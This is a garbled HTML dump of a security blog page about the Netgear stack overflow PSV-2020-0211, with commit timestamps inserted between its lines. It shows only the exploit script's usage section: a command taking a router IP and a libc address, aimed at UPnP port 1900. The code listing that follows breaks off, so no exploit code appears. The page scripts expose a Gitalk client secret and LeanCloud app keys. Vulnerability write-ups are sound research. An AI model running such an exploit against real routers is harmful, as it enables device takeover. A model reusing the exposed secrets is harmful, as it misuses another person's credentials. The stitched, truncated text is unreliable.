< h2 id = "0x06-脚本使用说明" > < a href = "#0x06-脚本使用说明" class = "headerlink" title = "0x06 脚本使用说明" > < / a > < strong > 0x06 脚本使用说明< / strong > < / h2 > < table >
< thead >
< tr >
< th > 脚本帮助:< / th >
< th > usage: python2 PSV-2020-0211.py 【路由器IP】 【任意libc有效地址】< / th >
< / tr >
< / thead >
< tbody >
< tr >
< td > 真实利用:< / td >
< td > IP:192.168.2.2 Port:upnp/1900< / td >
< / tr >
< tr >
< td > < / td >
< td > < img src = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1610083779/netgear/image_27.png" alt > < / td >
< / tr >
< / tbody >
< / table >
2021-04-11 06:53:08 +00:00
< figure class = "highlight python" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < span class = "line" > 22< / span > < br > < span class = "line" > 23< / span > < br > < span class = "line" > 24< / span > < br > < span class = "line" > 25< / span > < br > < span class = "line" > 26< / span > < br > < span class = "line" > 27< / span > < br > < span class = "line" > 28< / span > < br > < span class = "line" > 29< / span > < br > < span class = "line" > 30< / span > < br > < span class = "line" > 31< / span > < br > < span class = "line" > 32< / span > < br > < span class = "line" > 33< / span > < br > < span class = "line" > 34< / span > < br > < span class = "line" > 35< / span > < br > < span class = "line" > 36< / span > < br > < span class = "line" > 37< / span > < br > < span class = "line" > 38< / span > < br > < span class = "line" > 39< / span > < br > < span class = "line" > 40< / span > < br > < span class = "line" > 41< / span > < br > < span class = "line" > 42< / span > < br > < span class = "line" > 43< / span > < br > < span class = "line" > 44< / span > < br > < span class = "line" > 45< / span > < br > < span class = "line" > 46< / span > < br > < span class = "line" > 47< / span > < br > < span class = "line" > 48< / span > < br > < span class = "line" > 49< / span > < br > < span class = "line" > 50< / span > < br > < span class = "line" > 51< / span > < br > < span class = "line" > 52< / span > < br > < span class = "line" > 53< / span > < br > < span class = "line" > 54< / span > < br > < span class = "line" > 55< / span > < br > < span class = "line" > 56< / span > < br > < span class = "line" > 57< / span > < br > < span class = "line" > 58< / span > < br > < span class = "line" > 59< / span > < br > < span class = "line" > 60< / span > < br > < span class = "line" > 61< / span > < br > < span class = "line" > 62< / span > < br > < span class = "line" > 63< / span > < br > < span class = "line" > 64< / span > < br > < span class = "line" > 65< / span > < br > < span class = "line" > 66< / span > < br > < span class = "line" > 67< / span > < br > < span class = "line" > 68< / span > < br > < span class = "line" > 69< / span > < br > < span class = "line" > 70< / span > < br > < span class = "line" > 71< / span > < br > < span class = "line" > 72< / span > < br > < span class = "line" > 73< / span > < br > < span class = "line" > 74< / span > < br > < span class = "line" > 75< / span > < br > < span class = "line" > 76< / span > < br > < span class = "line" > 77< / span > < br > < span class = "line" > 78< / span > < br > < span class = "line" > 79< / span > < br > < span class = "line" > 80< / span > < br > < span class = "line" > 81< / span > < br > < span class = "line" > 82< / span > < br > < span class = "line" > 83< / span > < br > < span class = "line" > 84< / span > < br > < span class = "line" > 85< / span > < br > < span class = "line" > 86< / span > < br > < span class = "line" > 87< / span > < br > < span class = "line" > 88< / span > < br > < span class = "line" > 89< / span > < br > < span class = "line" > 90< / span > < br > < span class = "line" > 91< / span > < br > < span class = "line" > 92< / span > < br > < span class = "line" > 93< / span > < br > < span class = "line" > 94< / span > < br > < span class = "line" > 95< / span > < br > < span class = "line" > 96< / span > < br > < span class = "line" > 97< / span > < br > < span class = "line" > 98< / span > < br > < span class = "line" > 99< / span > < br > < span class = "line" > 100< / span > < br > < span class = "line" > 101< / span > < br > < span class = "line" > 102< / span > < br > < span class = "line" > 103< / span > < br > < span class = "line" > 104< / span > < br > < span class = "line" > 105< / span > < br > < span class = "line" > 106< / span > < br > < span class = "line" > 107< / span > < br > < span class = "line" > 108< / span > < br > < span class = "line" > 109< / span > < br > < span class = "line" > 110< / span > < br > < span class = "line" > 111< / span > < br > < span class = "line" > 112< / span > < br > < span class = "line" > 113< / span > < br > < span class = "line" > 114< / span > < br > < span class = "line" > 115< / span > < br > < span class = "line" > 116< / span > < br > < span class = "line" > 117< / span > < br > < span class = "line" > 118< / span > < br > < span class = "line" > 119< / span > < br > < span class = "line" > 120< / span > < br > < span class = "line" > 121< / span > < br > < span class = "line" > 122< / span > < br > < span class = "line" > 123< / span > < br > < span class = "line" > 124< / span > < br > < span class = "line" > 125< / span > < br > < span clas
2021-01-08 05:39:16 +00:00
< / div >
< div >
< div style = "padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;" >
< div > 您的支持将鼓励我继续创作!< / div >
< button id = "rewardButton" disable = "enable" onclick = "var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}" >
< span > 打赏< / span >
< / button >
< div id = "QR" style = "display: none;" >
< div id = "wechat" style = "display: inline-block" >
< img id = "wechat_qr" src = "/images/Wechatpay.png" alt = "Cool-Y 微信支付" >
< p > 微信支付< / p >
< / div >
< div id = "alipay" style = "display: inline-block" >
< img id = "alipay_qr" src = "/images/Alipay.png" alt = "Cool-Y 支付宝" >
< p > 支付宝< / p >
< / div >
< / div >
< / div >
< / div >
2021-04-10 12:03:10 +00:00
< div >
< ul class = "post-copyright" >
< li class = "post-copyright-author" >
< strong > 本文作者:< / strong >
Cool-Y
< / li >
< li class = "post-copyright-link" >
< strong > 本文链接:< / strong >
< a href = "https://cool-y.github.io/2021/01/08/Netgear-psv-2020-0211/" title = "Netgear_栈溢出漏洞_PSV-2020-0211" > https://cool-y.github.io/2021/01/08/Netgear-psv-2020-0211/< / a >
< / li >
< li class = "post-copyright-license" >
< strong > 版权声明: < / strong >
本博客所有文章除特别声明外,均采用 < a href = "https://creativecommons.org/licenses/by-nc-sa/3.0/" rel = "external nofollow" target = "_blank" > CC BY-NC-SA 3.0< / a > 许可协议。转载请注明出处!
< / li >
< / ul >
< / div >
2021-01-08 05:39:16 +00:00
< footer class = "post-footer" >
2021-01-08 05:55:39 +00:00
< div class = "post-tags" >
< a href = "/tags/UPnP/" rel = "tag" > # UPnP< / a >
< a href = "/tags/固件模拟/" rel = "tag" > # 固件模拟< / a >
2021-03-02 06:31:33 +00:00
< a href = "/tags/Netgear/" rel = "tag" > # Netgear< / a >
2021-01-08 05:55:39 +00:00
< / div >
2021-01-08 05:39:16 +00:00
2021-04-10 19:19:48 +00:00
< div class = "post-widgets" >
< div id = "needsharebutton-postbottom" >
< span class = "btn" >
< i class = "fa fa-share-alt" aria-hidden = "true" > < / i >
< / span >
< / div >
< / div >
2021-01-08 05:39:16 +00:00
< div class = "post-nav" >
< div class = "post-nav-next post-nav-item" >
< a href = "/2021/01/08/dolphin-attack-practice/" rel = "next" title = "Dolphin Attack 论文复现" >
< i class = "fa fa-chevron-left" > < / i > Dolphin Attack 论文复现
< / a >
< / div >
< span class = "post-nav-divider" > < / span >
< div class = "post-nav-prev post-nav-item" >
2021-01-08 08:35:03 +00:00
< a href = "/2021/01/08/nvram-config/" rel = "prev" title = "自动化获取nvram配置" >
自动化获取nvram配置 < i class = "fa fa-chevron-right" > < / i >
< / a >
2021-01-08 05:39:16 +00:00
< / div >
< / div >
< / footer >
< / div >
< / article >
< div class = "post-spread" >
< / div >
< / div >
< / div >
2021-04-10 12:37:40 +00:00
< div class = "comments" id = "comments" >
< div id = "gitalk-container" > < / div >
< / div >
2021-01-08 05:39:16 +00:00
< / div >
< div class = "sidebar-toggle" >
< div class = "sidebar-toggle-line-wrap" >
< span class = "sidebar-toggle-line sidebar-toggle-line-first" > < / span >
< span class = "sidebar-toggle-line sidebar-toggle-line-middle" > < / span >
< span class = "sidebar-toggle-line sidebar-toggle-line-last" > < / span >
< / div >
< / div >
< aside id = "sidebar" class = "sidebar" >
2021-04-10 20:13:11 +00:00
< div id = "sidebar-dimmer" > < / div >
2021-01-08 05:39:16 +00:00
< div class = "sidebar-inner" >
< ul class = "sidebar-nav motion-element" >
< li class = "sidebar-nav-toc sidebar-nav-active" data-target = "post-toc-wrap" >
文章目录
< / li >
< li class = "sidebar-nav-overview" data-target = "site-overview-wrap" >
站点概览
< / li >
< / ul >
< section class = "site-overview-wrap sidebar-panel" >
< div class = "site-overview" >
< div class = "site-author motion-element" itemprop = "author" itemscope itemtype = "http://schema.org/Person" >
< img class = "site-author-image" itemprop = "image" src = "/images/avatar.png" alt = "Cool-Y" >
< p class = "site-author-name" itemprop = "name" > Cool-Y< / p >
2021-04-10 20:10:04 +00:00
< p class = "site-description motion-element" itemprop = "description" > Juice is temporary but Sauce is forever< / p >
2021-01-08 05:39:16 +00:00
< / div >
< nav class = "site-state motion-element" >
< div class = "site-state-item site-state-posts" >
< a href = "/archives/" >
2021-05-20 11:39:04 +00:00
< span class = "site-state-item-count" > 31< / span >
2021-01-08 05:39:16 +00:00
< span class = "site-state-item-name" > 日志< / span >
< / a >
< / div >
< div class = "site-state-item site-state-categories" >
< a href = "/categories/index.html" >
< span class = "site-state-item-count" > 7< / span >
< span class = "site-state-item-name" > 分类< / span >
< / a >
< / div >
< div class = "site-state-item site-state-tags" >
< a href = "/tags/index.html" >
2021-04-10 10:53:27 +00:00
< span class = "site-state-item-count" > 55< / span >
2021-01-08 05:39:16 +00:00
< span class = "site-state-item-name" > 标签< / span >
< / a >
< / div >
< / nav >
2021-04-11 06:53:08 +00:00
< div class = "feed-link motion-element" >
< a href = "/atom.xml" rel = "alternate" >
< i class = "fa fa-rss" > < / i >
RSS
< / a >
< / div >
2021-01-08 05:39:16 +00:00
< div class = "links-of-author motion-element" >
< span class = "links-of-author-item" >
< a href = "https://github.com/Cool-Y" target = "_blank" title = "GitHub" >
< i class = "fa fa-fw fa-github" > < / i > GitHub< / a >
< / span >
< span class = "links-of-author-item" >
< a href = "mailto:cool.yim@whu.edu.cn" target = "_blank" title = "E-Mail" >
< i class = "fa fa-fw fa-envelope" > < / i > E-Mail< / a >
< / span >
< span class = "links-of-author-item" >
< a href = "https://www.instagram.com/yan__han/" target = "_blank" title = "Instagram" >
< i class = "fa fa-fw fa-instagram" > < / i > Instagram< / a >
< / span >
< / div >
< div id = "music163player" >
2021-04-10 12:03:10 +00:00
< iframe frameborder = "no" border = "0" marginwidth = "0" marginheight = "0" width = "330" height = "110" src = "//music.163.com/outchain/player?type=4&id=334277093&auto=1&height=90" > < / iframe >
2021-01-08 05:39:16 +00:00
< / div >
< / div >
< / section >
<!-- noindex -->
< section class = "post-toc-wrap motion-element sidebar-panel sidebar-panel-active" >
< div class = "post-toc" >
2021-01-08 05:55:39 +00:00
< div class = "post-toc-content" > < ol class = "nav" > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#0x00-漏洞概要" > < span class = "nav-text" > 0x00 漏洞概要< / span > < / a > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#0x01-威胁范围" > < span class = "nav-text" > 0x01 威胁范围< / span > < / a > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#0x02-Qemu模拟" > < span class = "nav-text" > 0x02 Qemu模拟< / span > < / a > < ol class = "nav-child" > < li class = "nav-item nav-level-3" > < a class = "nav-link" href = "#firmadyne" > < span class = "nav-text" > firmadyne< / span > < / a > < / li > < li class = "nav-item nav-level-3" > < a class = "nav-link" href = "#Qemu自定义" > < span class = "nav-text" > Qemu自定义< / span > < / a > < / li > < / ol > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#0x03-静态分析" > < span class = "nav-text" > 0x03 静态分析< / span > < / a > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#0x04-动态调试" > < span class = "nav-text" > 0x04 动态调试< / span > < / a > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#0x05-漏洞利用" > < span class = "nav-text" > 0x05 漏洞利用< / span > < / a > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#0x06-脚本使用说明" > < span class = "nav-text" > 0x06 脚本使用说明< / span > < / a > < / li > < / ol > < / div >
2021-01-08 05:39:16 +00:00
< / div >
< / section >
<!-- /noindex -->
< / div >
< / aside >
< / div >
< / main >
< footer id = "footer" class = "footer" >
< div class = "footer-inner" >
< div class = "copyright" > © 2019 — < span itemprop = "copyrightYear" > 2021< / span >
< span class = "with-love" >
< i class = "fa fa-user" > < / i >
< / span >
< span class = "author" itemprop = "copyrightHolder" > Cool-Y< / span >
< span class = "post-meta-divider" > |< / span >
< span class = "post-meta-item-icon" >
< i class = "fa fa-area-chart" > < / i >
< / span >
2021-05-20 11:39:04 +00:00
< span title = "Site words total count" > 105.1k< / span >
2021-01-08 05:39:16 +00:00
< / div >
< div class = "powered-by" > 由 < a class = "theme-link" target = "_blank" href = "https://hexo.io" > Hexo< / a > 强力驱动< / div >
< div class = "busuanzi-count" >
< script async src = "//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" > < / script >
< span class = "site-uv" >
< i class = "fa fa-user" > < / i >
< span class = "busuanzi-value" id = "busuanzi_value_site_uv" > < / span >
< / span >
< span class = "site-pv" >
< i class = "fa fa-eye" > < / i >
< span class = "busuanzi-value" id = "busuanzi_value_site_pv" > < / span >
< / span >
< / div >
< / div >
< / footer >
< div class = "back-to-top" >
< i class = "fa fa-arrow-up" > < / i >
2021-04-10 19:19:48 +00:00
< span id = "scrollpercent" > < span > 0< / span > %< / span >
2021-01-08 05:39:16 +00:00
< / div >
2021-04-10 19:19:48 +00:00
< div id = "needsharebutton-float" >
< span class = "btn" >
< i class = "fa fa-share-alt" aria-hidden = "true" > < / i >
< / span >
< / div >
2021-01-08 05:39:16 +00:00
< / div >
< script type = "text/javascript" >
if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
window.Promise = null;
}
< / script >
< script type = "text/javascript" src = "/lib/jquery/index.js?v=2.1.3" > < / script >
< script type = "text/javascript" src = "/lib/fastclick/lib/fastclick.min.js?v=1.0.6" > < / script >
< script type = "text/javascript" src = "/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7" > < / script >
< script type = "text/javascript" src = "/lib/velocity/velocity.min.js?v=1.2.1" > < / script >
< script type = "text/javascript" src = "/lib/velocity/velocity.ui.min.js?v=1.2.1" > < / script >
< script type = "text/javascript" src = "/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5" > < / script >
< script type = "text/javascript" src = "/js/src/utils.js?v=5.1.4" > < / script >
< script type = "text/javascript" src = "/js/src/motion.js?v=5.1.4" > < / script >
< script type = "text/javascript" src = "/js/src/scrollspy.js?v=5.1.4" > < / script >
< script type = "text/javascript" src = "/js/src/post-details.js?v=5.1.4" > < / script >
< script type = "text/javascript" src = "/js/src/bootstrap.js?v=5.1.4" > < / script >
2021-04-10 12:37:40 +00:00
2021-04-10 12:40:26 +00:00
<!-- LOCAL: You can save these files to your site and update links -->
< link rel = "stylesheet" href = "https://unpkg.com/gitalk/dist/gitalk.css" >
< script src = "https://unpkg.com/gitalk/dist/gitalk.min.js" > < / script >
<!-- END LOCAL -->
< script type = "text/javascript" >
function renderGitalk(){
var gitalk = new Gitalk({
owner: 'Cool-Y',
repo: 'gitment-comments',
clientID: '180955a2c3ae3d966d9a',
clientSecret: '1c5db4da72df5e6fc318d12afe5f4406f7c54343',
admin: 'Cool-Y',
2021-04-10 12:47:46 +00:00
id: decodeURI(location.pathname),
2021-04-10 12:40:26 +00:00
distractionFreeMode: 'true'
});
gitalk.render('gitalk-container');
}
renderGitalk();
< / script >
2021-01-08 05:39:16 +00:00
< script src = "https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js" > < / script >
2021-05-21 07:35:38 +00:00
< script > AV . initialize ( "CnxMogaLcXQrm9Q03lF8XH7j-gzGzoHsz" , "EHqNuJ6AYvuHnY6bN6w2SMXl" ) ; < / script >
2021-01-08 05:39:16 +00:00
< script >
function showTime(Counter) {
var query = new AV.Query(Counter);
var entries = [];
var $visitors = $(".leancloud_visitors");
$visitors.each(function () {
entries.push( $(this).attr("id").trim() );
});
query.containedIn('url', entries);
query.find()
.done(function (results) {
var COUNT_CONTAINER_REF = '.leancloud-visitors-count';
if (results.length === 0) {
$visitors.find(COUNT_CONTAINER_REF).text(0);
return;
}
for (var i = 0; i < results.length ; i + + ) {
var item = results[i];
var url = item.get('url');
var time = item.get('time');
var element = document.getElementById(url);
$(element).find(COUNT_CONTAINER_REF).text(time);
}
for(var i = 0; i < entries.length ; i + + ) {
var url = entries[i];
var element = document.getElementById(url);
var countSpan = $(element).find(COUNT_CONTAINER_REF);
if( countSpan.text() == '') {
countSpan.text(0);
}
}
})
.fail(function (object, error) {
console.log("Error: " + error.code + " " + error.message);
});
}
function addCount(Counter) {
var $visitors = $(".leancloud_visitors");
var url = $visitors.attr('id').trim();
var title = $visitors.attr('data-flag-title').trim();
var query = new AV.Query(Counter);
query.equalTo("url", url);
query.find({
success: function(results) {
if (results.length > 0) {
var counter = results[0];
counter.fetchWhenSave(true);
counter.increment("time");
counter.save(null, {
success: function(counter) {
var $element = $(document.getElementById(url));
$element.find('.leancloud-visitors-count').text(counter.get('time'));
},
error: function(counter, error) {
console.log('Failed to save Visitor num, with error message: ' + error.message);
}
});
} else {
var newcounter = new Counter();
/* Set ACL */
var acl = new AV.ACL();
acl.setPublicReadAccess(true);
acl.setPublicWriteAccess(true);
newcounter.setACL(acl);
/* End Set ACL */
newcounter.set("title", title);
newcounter.set("url", url);
newcounter.set("time", 1);
newcounter.save(null, {
success: function(newcounter) {
var $element = $(document.getElementById(url));
$element.find('.leancloud-visitors-count').text(newcounter.get('time'));
},
error: function(newcounter, error) {
console.log('Failed to create');
}
});
}
},
error: function(error) {
console.log('Error:' + error.code + " " + error.message);
}
});
}
$(function() {
var Counter = AV.Object.extend("Counter");
if ($('.leancloud_visitors').length == 1) {
addCount(Counter);
} else if ($('.post-title-link').length > 1) {
showTime(Counter);
}
});
< / script >
< script >
(function(){
var bp = document.createElement('script');
var curProtocol = window.location.protocol.split(':')[0];
if (curProtocol === 'https') {
bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
}
else {
bp.src = 'http://push.zhanzhang.baidu.com/push.js';
}
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(bp, s);
})();
< / script >
2021-04-10 19:19:48 +00:00
< link rel = "stylesheet" href = "/lib/needsharebutton/needsharebutton.css" >
2021-01-08 05:39:16 +00:00
2021-04-10 19:19:48 +00:00
< script src = "/lib/needsharebutton/needsharebutton.js" > < / script >
< script >
pbOptions = {};
pbOptions.iconStyle = "box";
pbOptions.boxForm = "horizontal";
pbOptions.position = "bottomCenter";
pbOptions.networks = "Weibo,Wechat,Douban,QQZone,Twitter,Facebook";
new needShareButton('#needsharebutton-postbottom', pbOptions);
flOptions = {};
flOptions.iconStyle = "box";
flOptions.boxForm = "horizontal";
flOptions.position = "middleRight";
flOptions.networks = "Weibo,Wechat,Douban,QQZone,Twitter,Facebook";
new needShareButton('#needsharebutton-float', flOptions);
< / script >
2021-01-08 05:39:16 +00:00
2021-04-10 19:19:48 +00:00
< script type = "text/javascript" src = "/js/src/js.cookie.js?v=5.1.4" > < / script >
< script type = "text/javascript" src = "/js/src/scroll-cookie.js?v=5.1.4" > < / script >
2021-01-08 05:39:16 +00:00
< / body >
< / html >